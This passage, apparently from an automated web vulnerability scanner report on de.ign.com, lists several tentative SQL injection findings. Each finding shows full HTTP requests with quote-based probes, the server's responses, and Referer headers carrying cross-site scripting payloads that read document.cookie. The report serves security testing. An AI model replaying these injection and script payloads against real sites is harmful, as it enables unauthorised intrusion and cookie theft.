1.15. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=183141&FlightID=161194&TargetID=8080&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10327,10820,11754,12248,14845,15232,16249,16251,17864,17902,19172,20798,20807,20875,20904,20947,22099,22285,22854,23359,23425,23427,23429,23472,23479,23480,23493&Targets=6556,29462,7012,29373,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,26016,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bfhoukn,bguRrblewbsuv [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=183141&FlightID=161194&TargetID=8080&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10327,10820,11754,12248,14845,15232,16249,16251,17864,17902,19172,20798,20807,20875,20904,20947,22099,22285,22854,23359,23425,23427,23429,23472,23479,23480,23493&Targets=6556,29462,7012,29373,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,26016,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bfhoukn,bguRrblewbsuv

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=183141&FlightID=161194&TargetID=8080&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10327,10820,11754,12248,14845,15232,16249,16251,17864,17902,19172,20798,20807,20875,20904,20947,22099,22285,22854,23359,23425,23427,23429,23472,23479,23480,23493&Targets=6556,29462,7012,29373,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,26016,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bfhoukn,bguRrblewbsuv HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:43:58 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=183141&FlightID=161194&TargetID=8080&EntityDefResetFlag=0&C=0&Segments=1,255,348,1241,1931,2092,2747,3975,4113,4170,4602,4603,4723,4917,4938,4969,5057,5718,5749,5753,5906,6102,6382,6573,6615,6671,6702,7102,7396,7491,7752,7888,8587,9598,10327,10820,11754,12248,14845,15232,16249,16251,17864,17902,19172,20798,20807,20875,20904,20947,22099,22285,22854,23359,23425,23427,23429,23472,23479,23480,23493&Targets=6556,29462,7012,29373,6505,8080,27699,28684,9128,6507,8524,9483,7085,6651,9170,10619,26089,26016,27914,29365&Values=25,31,43,60,72,80,91,101,110,150,152,235,260,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bfhoukn,bguRrblewbsuv HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:43:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:43:58 GMT
Connection: close
Vary: Accept-Encoding


1.16. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,16370,16896,22099,22854,23425,23427,23472,23479,23480,23493&Targets=5813,7752,10619,20838,20105&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bxtbict,bguRrfrbdmWag [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,16370,16896,22099,22854,23425,23427,23472,23479,23480,23493&Targets=5813,7752,10619,20838,20105&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bxtbict,bguRrfrbdmWag

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,16370,16896,22099,22854,23425,23427,23472,23479,23480,23493&Targets=5813,7752,10619,20838,20105&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bxtbict,bguRrfrbdmWag HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:37 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,16370,16896,22099,22854,23425,23427,23472,23479,23480,23493&Targets=5813,7752,10619,20838,20105&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,471,531,757,912,1187,1405,1481,1508,1594,1824,2336,3091,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=bxtbict,bguRrfrbdmWag HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(document.cookie)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; rsi_segs=10089; decc=US; NGUserID=a016c06-15003-1306593845-5; i18n-cc=US; freq=c-1297040561490v-1n-12mc+1297040561491mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; __utmb=173446715.3.10.1297040497

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:37 GMT
Connection: close
Vary: Accept-Encoding


1.17. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,16370,16896,22099,22854,23425,23427,23472,23479,23480,23493&Targets=5813,7752,10619,20838,20105&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cijnNxu,bguRragewbmAu [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,16370,16896,22099,22854,23425,23427,23472,23479,23480,23493&Targets=5813,7752,10619,20838,20105&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cijnNxu,bguRragewbmAu

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,16370,16896,22099,22854,23425,23427,23472,23479,23480,23493&Targets=5813,7752,10619,20838,20105&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cijnNxu,bguRragewbmAu HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:44:29 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,16370,16896,22099,22854,23425,23427,23472,23479,23480,23493&Targets=5813,7752,10619,20838,20105&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,471,531,757,912,1187,1405,1481,1508,1594,2336,3091,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cijnNxu,bguRragewbmAu HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://www.ign.com/?7f8bd%22-alert(1)-%2257a543695b9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATA=ign.129704044868759.173.193.214.243; optimizelyEndUserId=oeu1297040486304r0.669825860997662; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; __utmc=173446715; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; s_pers=%20s_nr%3D1297040551494%7C1299632551494%3B%20s_lv%3D1297040551496%7C1391648551496%3B%20s_lv_s%3DFirst%2520Visit%7C1297042351496%3B; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dmy.ign.com%253Awww.ign.com%3B%20s_c13%3Dmy.ign.com%253Awww.ign.com%3B%20s_sq%3D%3B; __utmb=173446715.1.10.1297040497; rsi_segs=10089; decc=US; NGUserID=a016c09-19918-1173906965-3; i18n-cc=US; freq=c-1297040390930v-1n-12mc+1297040390930mv+1mn+12wwe~0; optimizelyBuckets=%7B%224875108%22%3A4948008%7D

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:44:29 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:44:29 GMT
Connection: close
Vary: Accept-Encoding


1.18. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=5813,7752,10619,20838&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=Rnehdv,bguRrblewbsuN [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=5813,7752,10619,20838&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=Rnehdv,bguRrblewbsuN

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /event.ng/Type'=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=5813,7752,10619,20838&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=Rnehdv,bguRrblewbsuN HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 1

HTTP/1.1 500 Internal Server Error
Server: Apache/2.2.16 (Unix)
Content-Length: 544
nnCoection: close
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 07 Feb 2011 01:43:55 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>500 Internal Server Error</title>
</head><body>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error or
mis
...[SNIP]...

Request 2

GET /event.ng/Type''=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=5813,7752,10619,20838&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,448,531,757,912,1187,1405,1481,1508,1594,1824,2250,2868,3932,4056,4662,4799,5999,6623,8151,8978,41899,59328,61583,61766,65373&RawValues=&random=Rnehdv,bguRrblewbsuN HTTP/1.1
Host: de.ign.com
Proxy-Connection: keep-alive
Referer: http://cheats.ign.com/?7cd43%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebc6f5a7fbe9=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: decc=US; NGUserID=a016c02-23694-278760149-1; i18n-cc=US; freq=c-1297040427563v-1n-12mc+1297040427563mv+1mn+12wwe~0; ATA=ign.129704044868759.173.193.214.243

Response 2

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.16 (Unix)
Content-Length: 0
Location: http://ads.ign.com/advertisers/ign/1x1transparent.png
Content-Type: text/html
Expires: Mon, 07 Feb 2011 01:43:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 07 Feb 2011 01:43:55 GMT
Connection: close
Vary: Accept-Encoding


1.19. http://de.ign.com/event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=5813,7752,10619,20838&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cWtjorh,bguRqRgbdmoWz [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://de.ign.com
Path:   /event.ng/Type=count&ClientType=2&ASeg=&AMod=&AOpt=0&AdID=20289&FlightID=18182&TargetID=5813&EntityDefResetFlag=0&C=0&Segments=2747,4602,4603,4723,4900,4917,4960,5718,5749,5906,6102,6382,6573,7102,7396,7752,7888,8587,9598,11754,13633,14845,15232,16249,16251,22099,22854,23425,23427,23429,23472,23479,23480,23493&Targets=5813,7752,10619,20838&Values=25,31,43,60,72,80,91,101,110,150,152,235,275,448,531,757,912,1187,1405,1481,1508,1594,2250,2868,3481,3932,4056,4662,4799,5999,6623,8150,8978,41899,58049,59328,61583,61766,65373&RawValues=&random=cWtjorh,bguRqRgbdmoWz

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

